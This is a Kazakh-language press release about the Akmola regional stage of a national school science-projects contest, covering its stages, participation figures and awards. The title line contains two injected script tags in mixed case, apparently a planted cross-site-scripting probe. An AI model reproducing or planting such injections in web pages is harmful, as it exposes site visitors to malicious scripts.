Республика ғылыми жобалар конкурсы облыстық кезеңін өткізу туралы баспасөз хабарламасы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.11.2021

           Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау жөніндегі орталығы 2021 жылғы 15-19 қараша аралығында 8-11 сынып оқушылары арасында жалпы білім беретін пәндер бойынша республикалық ғылыми жобалар байқауының облыстық кезеңі қашықтық форматта өткізілді.

          Ғылыми конкурстың мақсаты - оқушылардың ғылыми-зерттеу және оқу-танымдық қызметін ынталандыру, неғұрлым талантты және дарынды жас зерттеушілерді іріктеу және қолдау, Қазақстан Республикасының зияткерлік әлеуетін қалыптастыруға жәрдемдесу.

          Ғылыми конкурс 4 кезеңде өткізіледі:

1)Бірінші кезең – аудандық;

2)Екінші кезең – іріктеу (ғылыми жобаны алдын-ала сараптамадан өткізу);

3)Үшінші кезең – облыстық. Облыстық кезең екі турда өткізілді. Бірінші айналым – ғылыми жобаны қорғау, екінші айналым – бейіндеу пәндері бойынша тестілеу.

Тестілеу 60 сұрақтан тұрады, орындауға 2 сағат уақыт беріледі.

4)Төртінші кезең – республикалық.

Аталмыш байқауға 338 ғылыми жоба беріліп, оның 192 сараптамадан өтті. Бұл байқауға Ақмола облысының барлық 14 ауданынан, Көкшетау, Степногорск қалаларынан және 3 облыстық дарынды балаларға арналған мамандандырылған мектеп-интернаттарынан 216 оқушы қатысты.

          Ғылыми жобаларды қорғау төрт бағыт бойынша жүзеге асырылады:

«Ғылыми-техникалық прогресс-экономикалық өсудің негізгі буыны ретінде», физика, техника, жер және ғарыш туралы ғылым секциялары; 20 жоба, 3 командалық жұмыс, 23 қатысушы;

«Экономикалық және әлеуметтік үдерістерді математикалық модельдеу», математика, қолданбалы математика, информатика, экономика секциялары; 40 жоба, 2 командалық жұмыс, 42 қатысушы;

«Салауатты табиғи орта – «Қазақстан-2050» стратегиясын іске асырудың негізі», биология, химия, қоршаған ортаны қорғау секциялары; 35 жоба, 4 командалық жұмыс, 39 қатысушы;

«Қазақстанның тарихи ескерткіштері және перспективалы туристік бағыттар», тарих, өлкетану, тіл білімі, әдебиет, этномәдениеттану, Адам. Қоғам. Құқық; 95 жоба, 14 командалық жұмыс, 109 қатысушы.

Конкурс қорытындысы бойынша:

- І дәрежелі дипломдармен-17 қатысушы;

- ІІ дәрежелі дипломдармен-37 қатысушы;

- ІІІ дәрежелі дипломдармен - 48 қатысушы;

- 22 қатысушы грамоталармен марапатталды.

   

   

 

Просмотров: 373


Пікір қосу



Деректерді қолтаңбаға қосу